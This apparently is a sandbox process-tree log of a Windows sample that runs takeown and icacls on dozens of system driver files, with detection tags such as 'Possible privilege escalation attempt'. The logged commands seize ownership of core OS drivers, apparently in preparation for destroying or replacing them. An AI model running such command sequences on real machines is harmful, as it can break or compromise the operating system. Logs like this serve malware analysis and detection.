C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\CAD.sys && icacls C:\Windows\System32\drivers\CAD.sys /grant "%username%:F" && exit2⤵PID:5588
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\CAD.sys3⤵PID:5420
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\CAD.sys /grant "Admin:F"3⤵PID:5448
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\cdfs.sys && icacls C:\Windows\System32\drivers\cdfs.sys /grant "%username%:F" && exit2⤵PID:1748
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\cdfs.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2500
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\cdfs.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:2928
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\cdrom.sys && icacls C:\Windows\System32\drivers\cdrom.sys /grant "%username%:F" && exit2⤵PID:6112
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\cdrom.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5424
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\cdrom.sys /grant "Admin:F"3⤵PID:6140
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\CEA.sys && icacls C:\Windows\System32\drivers\CEA.sys /grant "%username%:F" && exit2⤵PID:5240
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\CEA.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5936
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\CEA.sys /grant "Admin:F"3⤵PID:836
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\cht4dx64.sys && icacls C:\Windows\System32\drivers\cht4dx64.sys /grant "%username%:F" && exit2⤵PID:1332
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\cht4dx64.sys3⤵PID:5332
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\cht4dx64.sys /grant "Admin:F"3⤵PID:3260
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\cht4sx64.sys && icacls C:\Windows\System32\drivers\cht4sx64.sys /grant "%username%:F" && exit2⤵PID:5708
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\cht4sx64.sys3⤵PID:5864
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\cht4sx64.sys /grant "Admin:F"3⤵PID:5160
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\cht4vfx.sys && icacls C:\Windows\System32\drivers\cht4vfx.sys /grant "%username%:F" && exit2⤵PID:5696
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\cht4vfx.sys3⤵PID:5268
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\cht4vfx.sys /grant "Admin:F"3⤵PID:5836
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\cht4vx64.sys && icacls C:\Windows\System32\drivers\cht4vx64.sys /grant "%username%:F" && exit2⤵PID:5844
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\cht4vx64.sys3⤵PID:5784
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\cht4vx64.sys /grant "Admin:F"3⤵PID:2604
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\cimfs.sys && icacls C:\Windows\System32\drivers\cimfs.sys /grant "%username%:F" && exit2⤵PID:3816
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\cimfs.sys3⤵PID:5564
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\cimfs.sys /grant "Admin:F"3⤵PID:5976
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\circlass.sys && icacls C:\Windows\System32\drivers\circlass.sys /grant "%username%:F" && exit2⤵PID:5176
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\circlass.sys3⤵PID:5144
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\circlass.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:5532
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Classpnp.sys && icacls C:\Windows\System32\drivers\Classpnp.sys /grant "%username%:F" && exit2⤵PID:5336
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\Classpnp.sys3⤵PID:2928
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\Classpnp.sys /grant "Admin:F"3⤵PID:5756
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\cldflt.sys && icacls C:\Windows\System32\drivers\cldflt.sys /grant "%username%:F" && exit2⤵PID:5044
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\cldflt.sys3⤵PID:5748
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\cldflt.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:5404
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\clfs.sys && icacls C:\Windows\System32\drivers\clfs.sys /grant "%username%:F" && exit2⤵PID:5664
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\clfs.sys3⤵PID:5332
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\clfs.sys /grant "Admin:F"3⤵PID:5392
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ClipSp.sys && icacls C:\Windows\System32\drivers\ClipSp.sys /grant "%username%:F" && exit2⤵PID:3900
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ClipSp.sys3⤵PID:5744
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ClipSp.sys /grant "Admin:F"3⤵PID:5820
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\CmBatt.sys && icacls C:\Windows\System32\drivers\CmBatt.sys /grant "%username%:F" && exit2⤵PID:2504
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\CmBatt.sys3⤵PID:5144
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\CmBatt.sys /grant "Admin:F"3⤵PID:5868
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\cmimcext.sys && icacls C:\Windows\System32\drivers\cmimcext.sys /grant "%username%:F" && exit2⤵PID:4952
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\cmimcext.sys3⤵PID:6132
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\cmimcext.sys /grant "Admin:F"3⤵PID:5224
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\cng.sys && icacls C:\Windows\System32\drivers\cng.sys /grant "%username%:F" && exit2⤵PID:5944
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\cng.sys3⤵PID:1612
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\cng.sys /grant "Admin:F"3⤵PID:5020
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\cnghwassist.sys && icacls C:\Windows\System32\drivers\cnghwassist.sys /grant "%username%:F" && exit2⤵PID:1304
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\cnghwassist.sys3⤵PID:6052
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\cnghwassist.sys /grant "Admin:F"3⤵PID:5796
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\condrv.sys && icacls C:\Windows\System32\drivers\condrv.sys /grant "%username%:F" && exit2⤵PID:5484
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\condrv.sys3⤵PID:5280
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\condrv.sys /grant "Admin:F"3⤵PID:5920
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\crashdmp.sys && icacls C:\Windows\System32\drivers\crashdmp.sys /grant "%username%:F" && exit2⤵PID:5576
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\crashdmp.sys3⤵PID:6032
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\crashdmp.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:3688
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\csc.sys && icacls C:\Windows\System32\drivers\csc.sys /grant "%username%:F" && exit2⤵PID:5864
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\csc.sys3⤵PID:5156
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\csc.sys /grant "Admin:F"3⤵PID:6068
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dam.sys && icacls C:\Windows\System32\drivers\dam.sys /grant "%username%:F" && exit2⤵PID:5136
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\dam.sys3⤵PID:5676
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\dam.sys /grant "Admin:F"3⤵PID:5220
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\devauthe.sys && icacls C:\Windows\System32\drivers\devauthe.sys /grant "%username%:F" && exit2⤵PID:5268
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\devauthe.sys3⤵PID:5500
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\devauthe.sys /grant "Admin:F"3⤵PID:5168
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dfsc.sys && icacls C:\Windows\System32\drivers\dfsc.sys /grant "%username%:F" && exit2⤵PID:5872
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\dfsc.sys3⤵
- Possible privilege escalation attempt
PID:5828
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\dfsc.sys /grant "Admin:F"3⤵PID:6000
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\disk.sys && icacls C:\Windows\System32\drivers\disk.sys /grant "%username%:F" && exit2⤵PID:5900
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\disk.sys3⤵PID:2320
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\disk.sys /grant "Admin:F"3⤵PID:5896
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Diskdump.sys && icacls C:\Windows\System32\drivers\Diskdump.sys /grant "%username%:F" && exit2⤵PID:5296
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\Diskdump.sys3⤵PID:3792
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\Diskdump.sys /grant "Admin:F"3⤵PID:2728
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Dmpusbstor.sys && icacls C:\Windows\System32\drivers\Dmpusbstor.sys /grant "%username%:F" && exit2⤵PID:1064
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\Dmpusbstor.sys3⤵PID:5988
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\Dmpusbstor.sys /grant "Admin:F"3⤵PID:6132
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dmvsc.sys && icacls C:\Windows\System32\drivers\dmvsc.sys /grant "%username%:F" && exit2⤵PID:5916
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\dmvsc.sys3⤵PID:3260
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\dmvsc.sys /grant "Admin:F"3⤵PID:5848
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\drmk.sys && icacls C:\Windows\System32\drivers\drmk.sys /grant "%username%:F" && exit2⤵PID:5280
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\drmk.sys3⤵PID:5636
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\drmk.sys /grant "Admin:F"3⤵PID:5408
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\drmkaud.sys && icacls C:\Windows\System32\drivers\drmkaud.sys /grant "%username%:F" && exit2⤵PID:5436
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\drmkaud.sys3⤵PID:5796
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\drmkaud.sys /grant "Admin:F"3⤵PID:3700
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Dumpata.sys && icacls C:\Windows\System32\drivers\Dumpata.sys /grant "%username%:F" && exit2⤵PID:5180
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\Dumpata.sys3⤵PID:6036
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\Dumpata.sys /grant "Admin:F"3⤵PID:5616
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dumpfve.sys && icacls C:\Windows\System32\drivers\dumpfve.sys /grant "%username%:F" && exit2⤵PID:5676
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\dumpfve.sys3⤵PID:3700
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\dumpfve.sys /grant "Admin:F"3⤵PID:5636
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dumpsd.sys && icacls C:\Windows\System32\drivers\dumpsd.sys /grant "%username%:F" && exit2⤵PID:5316
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\dumpsd.sys3⤵PID:5700
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\dumpsd.sys /grant "Admin:F"3⤵PID:5452
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dumpsdport.sys && icacls C:\Windows\System32\drivers\dumpsdport.sys /grant "%username%:F" && exit2⤵PID:5200
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\dumpsdport.sys3⤵PID:5684
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\dumpsdport.sys /grant "Admin:F"3⤵PID:5636
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Dumpstorport.sys && icacls C:\Windows\System32\drivers\Dumpstorport.sys /grant "%username%:F" && exit2⤵PID:5784
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\Dumpstorport.sys3⤵PID:5524
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\Dumpstorport.sys /grant "Admin:F"3⤵PID:5376
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dwflwz0bopps5g.sys && icacls C:\Windows\System32\drivers\dwflwz0bopps5g.sys /grant "%username%:F" && exit2⤵PID:5148
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\dwflwz0bopps5g.sys3⤵
- Modifies file permissions
PID:5716
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\dwflwz0bopps5g.sys /grant "Admin:F"3⤵PID:6008
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dxgkrnl.sys && icacls C:\Windows\System32\drivers\dxgkrnl.sys /grant "%username%:F" && exit2⤵PID:5976
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\dxgkrnl.sys3⤵PID:2728
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\dxgkrnl.sys /grant "Admin:F"3⤵PID:5424
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dxgmms1.sys && icacls C:\Windows\System32\drivers\dxgmms1.sys /grant "%username%:F" && exit2⤵PID:3792
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\dxgmms1.sys3⤵PID:5500
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\dxgmms1.sys /grant "Admin:F"3⤵PID:5812
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dxgmms2.sys && icacls C:\Windows\System32\drivers\dxgmms2.sys /grant "%username%:F" && exit2⤵PID:5324
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\dxgmms2.sys3⤵PID:5884
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\dxgmms2.sys /grant "Admin:F"3⤵PID:6288
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\EhStorClass.sys && icacls C:\Windows\System32\drivers\EhStorClass.sys /grant "%username%:F" && exit2⤵PID:6020
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\EhStorClass.sys3⤵PID:5392
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\EhStorClass.sys /grant "Admin:F"3⤵PID:6168
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\EhStorTcgDrv.sys && icacls C:\Windows\System32\drivers\EhStorTcgDrv.sys /grant "%username%:F" && exit2⤵PID:6032
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5448
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\EhStorTcgDrv.sys3⤵PID:5920
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\EhStorTcgDrv.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:6264
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\errdev.sys && icacls C:\Windows\System32\drivers\errdev.sys /grant "%username%:F" && exit2⤵PID:5404
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\errdev.sys3⤵PID:5616
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\errdev.sys /grant "Admin:F"3⤵PID:6364
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\evbd0a.sys && icacls C:\Windows\System32\drivers\evbd0a.sys /grant "%username%:F" && exit2⤵PID:5428
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\evbd0a.sys3⤵PID:5884
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\evbd0a.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:6536
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\evbda.sys && icacls C:\Windows\System32\drivers\evbda.sys /grant "%username%:F" && exit2⤵PID:5936
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\evbda.sys3⤵PID:6192
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\evbda.sys /grant "Admin:F"3⤵PID:6672
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ExecutionContext.sys && icacls C:\Windows\System32\drivers\ExecutionContext.sys /grant "%username%:F" && exit2⤵PID:6064
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ExecutionContext.sys3⤵PID:6296
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ExecutionContext.sys /grant "Admin:F"3⤵PID:6580
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\exfat.sys && icacls C:\Windows\System32\drivers\exfat.sys /grant "%username%:F" && exit2⤵PID:4472
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\exfat.sys3⤵PID:6708
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\exfat.sys /grant "Admin:F"3⤵PID:5020
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fastfat.sys && icacls C:\Windows\System32\drivers\fastfat.sys /grant "%username%:F" && exit2⤵PID:5480
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\fastfat.sys3⤵PID:6836
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\fastfat.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:7100
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fdc.sys && icacls C:\Windows\System32\drivers\fdc.sys /grant "%username%:F" && exit2⤵PID:5420
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\fdc.sys3⤵PID:6512
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\fdc.sys /grant "Admin:F"3⤵PID:6608
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\filecrypt.sys && icacls C:\Windows\System32\drivers\filecrypt.sys /grant "%username%:F" && exit2⤵PID:5248
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\filecrypt.sys3⤵PID:6720
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\filecrypt.sys /grant "Admin:F"3⤵PID:5188
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fileinfo.sys && icacls C:\Windows\System32\drivers\fileinfo.sys /grant "%username%:F" && exit2⤵PID:5424
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\fileinfo.sys3⤵PID:6616
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\fileinfo.sys /grant "Admin:F"3⤵PID:7084
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\filetrace.sys && icacls C:\Windows\System32\drivers\filetrace.sys /grant "%username%:F" && exit2⤵PID:6212
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\filetrace.sys3⤵
- Modifies file permissions
PID:6804
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\filetrace.sys /grant "Admin:F"3⤵PID:7004
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\flpydisk.sys && icacls C:\Windows\System32\drivers\flpydisk.sys /grant "%username%:F" && exit2⤵PID:6332
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\flpydisk.sys3⤵PID:6916
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\flpydisk.sys /grant "Admin:F"3⤵PID:2748
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fltMgr.sys && icacls C:\Windows\System32\drivers\fltMgr.sys /grant "%username%:F" && exit2⤵PID:6376
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\fltMgr.sys3⤵
- Modifies file permissions
PID:7148
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\fltMgr.sys /grant "Admin:F"3⤵PID:6052
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fsdepends.sys && icacls C:\Windows\System32\drivers\fsdepends.sys /grant "%username%:F" && exit2⤵PID:6436
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\fsdepends.sys3⤵PID:836
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\fsdepends.sys /grant "Admin:F"3⤵PID:5440
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fs_rec.sys && icacls C:\Windows\System32\drivers\fs_rec.sys /grant "%username%:F" && exit2⤵PID:6472
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\fs_rec.sys3⤵PID:6940
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\fs_rec.sys /grant "Admin:F"3⤵PID:6324
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fvevol.sys && icacls C:\Windows\System32\drivers\fvevol.sys /grant "%username%:F" && exit2⤵PID:6544
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\fvevol.sys3⤵PID:6988
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\fvevol.sys /grant "Admin:F"3⤵PID:6300
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\FWPKCLNT.SYS && icacls C:\Windows\System32\drivers\FWPKCLNT.SYS /grant "%username%:F" && exit2⤵PID:6628
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\FWPKCLNT.SYS3⤵PID:7112
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\FWPKCLNT.SYS /grant "Admin:F"3⤵PID:6648
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\gm.dls && icacls C:\Windows\System32\drivers\gm.dls /grant "%username%:F" && exit2⤵PID:6752
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\gm.dls3⤵PID:5144
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\gm.dls /grant "Admin:F"3⤵PID:6676
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\gmreadme.txt && icacls C:\Windows\System32\drivers\gmreadme.txt /grant "%username%:F" && exit2⤵PID:6864
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\gmreadme.txt3⤵PID:5380
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\gmreadme.txt /grant "Admin:F"3⤵PID:5332
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\gpuenergydrv.sys && icacls C:\Windows\System32\drivers\gpuenergydrv.sys /grant "%username%:F" && exit2⤵PID:6892
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\gpuenergydrv.sys3⤵PID:5372
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\gpuenergydrv.sys /grant "Admin:F"3⤵PID:5820
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hdaudbus.sys && icacls C:\Windows\System32\drivers\hdaudbus.sys /grant "%username%:F" && exit2⤵PID:6956
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\hdaudbus.sys3⤵PID:5700
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\hdaudbus.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:5896
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\HdAudio.sys && icacls C:\Windows\System32\drivers\HdAudio.sys /grant "%username%:F" && exit2⤵PID:7020
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\HdAudio.sys3⤵PID:5312
-
-
